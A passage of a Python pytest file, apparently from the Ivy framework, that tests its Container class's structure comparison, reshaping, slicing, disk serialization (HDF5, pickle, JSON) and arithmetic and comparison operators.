assert not ivy.Container.identical_structure([container1, container2])
assert not ivy.Container.identical_structure([container1, container0, container2])
# partial
assert ivy.Container.identical_structure([container0, container4], partial=True)
assert ivy.Container.identical_structure([container1, container4], partial=True)
assert ivy.Container.identical_structure([container2, container4], partial=True)
assert ivy.Container.identical_structure([container3, container4], partial=True)
assert ivy.Container.identical_structure([container4, container4], partial=True)
assert not ivy.Container.identical_structure([container0, container5], partial=True)
assert not ivy.Container.identical_structure([container1, container5], partial=True)
assert not ivy.Container.identical_structure([container2, container5], partial=True)
assert not ivy.Container.identical_structure([container3, container5], partial=True)
assert not ivy.Container.identical_structure([container4, container5], partial=True)
def test_container_identical_configs(device, call):
container0 = Container({"a": ivy.array([1], device=device)}, print_limit=5)
container1 = Container({"a": ivy.array([1], device=device)}, print_limit=5)
container2 = Container({"a": ivy.array([1], device=device)}, print_limit=10)
# with identical
assert ivy.Container.identical_configs([container0, container1])
assert ivy.Container.identical_configs([container1, container0])
assert ivy.Container.identical_configs([container1, container0, container1])
# without identical
assert not ivy.Container.identical_configs([container1, container2])
assert not ivy.Container.identical_configs([container1, container0, container2])
def test_container_identical_array_shapes(device, call):
# without key_chains specification
container0 = Container(
{
"a": ivy.array([1, 2], device=device),
"b": {
"c": ivy.array([2, 3, 4], device=device),
"d": ivy.array([3, 4, 5, 6], device=device),
},
}
)
container1 = Container(
{
"a": ivy.array([1, 2, 3, 4], device=device),
"b": {
"c": ivy.array([3, 4], device=device),
"d": ivy.array([3, 4, 5], device=device),
},
}
)
container2 = Container(
{
"a": ivy.array([1, 2, 3, 4], device=device),
"b": {
"c": ivy.array([3, 4], device=device),
"d": ivy.array([3, 4, 5, 6], device=device),
},
}
)
# with identical
assert ivy.Container.identical_array_shapes([container0, container1])
assert ivy.Container.identical_array_shapes([container1, container0])
assert ivy.Container.identical_array_shapes([container1, container0, container1])
assert not ivy.Container.identical([container0, container2])
assert not ivy.Container.identical([container1, container2])
assert not ivy.Container.identical([container0, container1, container2])
def test_container_dtype(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2.0], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
dtype_container = container.dtype()
for (key, value), expected_value in zip(
dtype_container.to_iterator(),
[
ivy.array([1], device=device).dtype,
ivy.array([2.0], device=device).dtype,
ivy.array([3], device=device).dtype,
],
):
assert value == expected_value
def test_container_with_entries_as_lists(device, call):
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2.0], device=device), "d": "some string"},
}
container = Container(dict_in)
container_w_list_entries = container.with_entries_as_lists()
for (key, value), expected_value in zip(
container_w_list_entries.to_iterator(), [[1], [2.0], "some string"]
):
assert value == expected_value
def test_container_reshape_like(device, call):
container = Container(
{
"a": ivy.array([[1.0]], device=device),
"b": {
"c": ivy.array([[3.0], [4.0]], device=device),
"d": ivy.array([[5.0], [6.0], [7.0]], device=device),
},
}
)
new_shapes = Container({"a": (1,), "b": {"c": (1, 2, 1), "d": (3, 1, 1)}})
# without leading shape
container_reshaped = container.reshape_like(new_shapes)
assert list(container_reshaped["a"].shape) == [1]
assert list(container_reshaped.a.shape) == [1]
assert list(container_reshaped["b"]["c"].shape) == [1, 2, 1]
assert list(container_reshaped.b.c.shape) == [1, 2, 1]
assert list(container_reshaped["b"]["d"].shape) == [3, 1, 1]
assert list(container_reshaped.b.d.shape) == [3, 1, 1]
# with leading shape
container = Container(
{
"a": ivy.array([[[1.0]], [[1.0]], [[1.0]]], device=device),
"b": {
"c": ivy.array(
[[[3.0], [4.0]], [[3.0], [4.0]], [[3.0], [4.0]]], device=device
),
"d": ivy.array(
[
[[5.0], [6.0], [7.0]],
[[5.0], [6.0], [7.0]],
[[5.0], [6.0], [7.0]],
],
device=device,
),
},
}
)
container_reshaped = container.reshape_like(new_shapes, leading_shape=[3])
assert list(container_reshaped["a"].shape) == [3, 1]
assert list(container_reshaped.a.shape) == [3, 1]
assert list(container_reshaped["b"]["c"].shape) == [3, 1, 2, 1]
assert list(container_reshaped.b.c.shape) == [3, 1, 2, 1]
assert list(container_reshaped["b"]["d"].shape) == [3, 3, 1, 1]
assert list(container_reshaped.b.d.shape) == [3, 3, 1, 1]
def test_container_slice(device, call):
dict_in = {
"a": ivy.array([[0.0], [1.0]], device=device),
"b": {
"c": ivy.array([[1.0], [2.0]], device=device),
"d": ivy.array([[2.0], [3.0]], device=device),
},
}
container = Container(dict_in)
container0 = container[0]
container1 = container[1]
assert np.array_equal(ivy.to_numpy(container0["a"]), np.array([0.0]))
assert np.array_equal(ivy.to_numpy(container0.a), np.array([0.0]))
assert np.array_equal(ivy.to_numpy(container0["b"]["c"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container0.b.c), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container0["b"]["d"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container0.b.d), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container1["a"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container1.a), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container1["b"]["c"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container1.b.c), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container1["b"]["d"]), np.array([3.0]))
assert np.array_equal(ivy.to_numpy(container1.b.d), np.array([3.0]))
def test_container_slice_via_key(device, call):
dict_in = {
"a": {
"x": ivy.array([0.0], device=device),
"y": ivy.array([1.0], device=device),
},
"b": {
"c": {
"x": ivy.array([1.0], device=device),
"y": ivy.array([2.0], device=device),
},
"d": {
"x": ivy.array([2.0], device=device),
"y": ivy.array([3.0], device=device),
},
},
}
container = Container(dict_in)
containerx = container.slice_via_key("x")
containery = container.slice_via_key("y")
assert np.array_equal(ivy.to_numpy(containerx["a"]), np.array([0.0]))
assert np.array_equal(ivy.to_numpy(containerx.a), np.array([0.0]))
assert np.array_equal(ivy.to_numpy(containerx["b"]["c"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containerx.b.c), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containerx["b"]["d"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containerx.b.d), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containery["a"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containery.a), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containery["b"]["c"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containery.b.c), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containery["b"]["d"]), np.array([3.0]))
assert np.array_equal(ivy.to_numpy(containery.b.d), np.array([3.0]))
def test_container_to_and_from_disk_as_hdf5(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.hdf5"
dict_in_1 = {
"a": ivy.array([np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0)], device=device),
},
}
container1 = Container(dict_in_1)
dict_in_2 = {
"a": ivy.array([np.float32(1.0), np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0), np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0), np.float32(3.0)], device=device),
},
}
container2 = Container(dict_in_2)
# saving
container1.to_disk_as_hdf5(save_filepath, max_batch_size=2)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_hdf5(save_filepath, slice(1))
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container1.a))
assert np.array_equal(
ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container1.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container1.b.d)
)
# appending
container1.to_disk_as_hdf5(save_filepath, max_batch_size=2, starting_index=1)
assert os.path.exists(save_filepath)
# loading after append
loaded_container = Container.from_disk_as_hdf5(save_filepath)
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container2.a))
assert np.array_equal(
ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container2.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container2.b.d)
)
# load slice
loaded_sliced_container = Container.from_disk_as_hdf5(save_filepath, slice(1, 2))
assert np.array_equal(
ivy.to_numpy(loaded_sliced_container.a), ivy.to_numpy(container1.a)
)
assert np.array_equal(
ivy.to_numpy(loaded_sliced_container.b.c), ivy.to_numpy(container1.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_sliced_container.b.d), ivy.to_numpy(container1.b.d)
)
# file size
file_size, batch_size = Container.h5_file_size(save_filepath)
assert file_size == 6 * np.dtype(np.float32).itemsize
assert batch_size == 2
os.remove(save_filepath)
def test_container_to_disk_shuffle_and_from_disk_as_hdf5(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.hdf5"
dict_in = {
"a": ivy.array([1, 2, 3], device=device),
"b": {
"c": ivy.array([1, 2, 3], device=device),
"d": ivy.array([1, 2, 3], device=device),
},
}
container = Container(dict_in)
# saving
container.to_disk_as_hdf5(save_filepath, max_batch_size=3)
assert os.path.exists(save_filepath)
# shuffling
Container.shuffle_h5_file(save_filepath)
# loading
container_shuffled = Container.from_disk_as_hdf5(save_filepath, slice(3))
# testing
data = np.array([1, 2, 3])
random.seed(0)
random.shuffle(data)
assert (ivy.to_numpy(container_shuffled["a"]) == data).all()
assert (ivy.to_numpy(container_shuffled.a) == data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == data).all()
assert (ivy.to_numpy(container_shuffled.b.d) == data).all()
os.remove(save_filepath)
def test_container_pickle(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
dict_in = {
"a": ivy.array([np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0)], device=device),
},
}
# without module attribute
cont = Container(dict_in)
assert cont._local_ivy is None
pickled = pickle.dumps(cont)
cont_again = pickle.loads(pickled)
assert cont_again._local_ivy is None
ivy.Container.identical_structure([cont, cont_again])
ivy.Container.identical_configs([cont, cont_again])
# with module attribute
cont = Container(dict_in, ivyh=ivy)
assert cont._local_ivy is ivy
pickled = pickle.dumps(cont)
cont_again = pickle.loads(pickled)
# noinspection PyUnresolvedReferences
assert cont_again._local_ivy.current_framework_str() is ivy.current_framework_str()
ivy.Container.identical_structure([cont, cont_again])
ivy.Container.identical_configs([cont, cont_again])
def test_container_to_and_from_disk_as_pickled(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.pickled"
dict_in = {
"a": ivy.array([np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0)], device=device),
},
}
container = Container(dict_in)
# saving
container.to_disk_as_pickled(save_filepath)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_pickled(save_filepath)
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container.a))
assert np.array_equal(
ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container.b.d)
)
os.remove(save_filepath)
def test_container_to_and_from_disk_as_json(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.json"
dict_in = {
"a": 1.274e-7,
"b": {"c": True, "d": ivy.array([np.float32(3.0)], device=device)},
}
container = Container(dict_in)
# saving
container.to_disk_as_json(save_filepath)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_json(save_filepath)
assert np.array_equal(loaded_container.a, container.a)
assert np.array_equal(loaded_container.b.c, container.b.c)
assert isinstance(loaded_container.b.d, str)
os.remove(save_filepath)
def test_container_positive(device, call):
container = +Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([-2], device=device),
"d": ivy.array([3], device=device),
},
}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([-2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([-2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_negative(device, call):
container = -Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([-2], device=device),
"d": ivy.array([3], device=device),
},
}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([-1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([-1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([-3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([-3]))
def test_container_pow(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container = container_a**container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([16]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([16]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([729]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([729]))
def test_container_scalar_pow(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container_a**2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_reverse_scalar_pow(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2**container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([8]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([8]))
def test_container_scalar_addition(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container += 3
assert np.allclose(ivy.to_numpy(container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
def test_container_reverse_scalar_addition(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 3 + container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
def test_container_addition(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container = container_a + container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.a), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([6]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_scalar_subtraction(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container -= 1
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_reverse_scalar_subtraction(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 1 - container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([-1]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([-1]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([-2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([-2]))
def test_container_subtraction(device, call):
container_a = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([1], device=device),
"d": ivy.array([4], device=device),
},
}
)
container = container_a - container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_scalar_multiplication(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([3.0], device=device),
},
}
)
container *= 2.5
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([7.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([7.5]))
def test_container_reverse_scalar_multiplication(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([3.0], device=device),
},
}
)
container = 2.5 * container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([7.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([7.5]))
def test_container_multiplication(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container = container_a * container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([8]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([8]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([18]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([18]))
def test_container_scalar_truediv(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([5.0], device=device),
"d": ivy.array([5.0], device=device),
},
}
)
container /= 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2.5]))
def test_container_reverse_scalar_truediv(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([5.0], device=device),
"d": ivy.array([5.0], device=device),
},
}
)
container = 2 / container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2.0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([0.4]))
def test_container_truediv(device, call):
container_a = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([5.0], device=device),
"d": ivy.array([5.0], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([4.0], device=device),
},
}
)
container = container_a / container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([1.25]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([1.25]))
def test_container_scalar_floordiv(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the // operator, can add if explicit
# ivy.floordiv is implemented at some point
pytest.skip()
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container //= 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_reverse_scalar_floordiv(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the // operator, can add if explicit
# ivy.floordiv is implemented at some point
pytest.skip()
container = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([1], device=device),
"d": ivy.array([7], device=device),
},
}
)
container = 5 // container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([0]))
def test_container_floordiv(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the // operator, can add if explicit
# ivy.floordiv is implemented at some point
pytest.skip()
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([4], device=device),
},
}
)
container = container_a // container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([1]))
def test_container_abs(device, call):
container = abs(
Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([-2], device=device),
"d": ivy.array([3], device=device),
},
}
)
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_scalar_less_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container < 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_less_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 < container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_less_than(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a < container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_less_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container <= 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_less_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 <= container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_less_than_or_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a <= container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container == 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
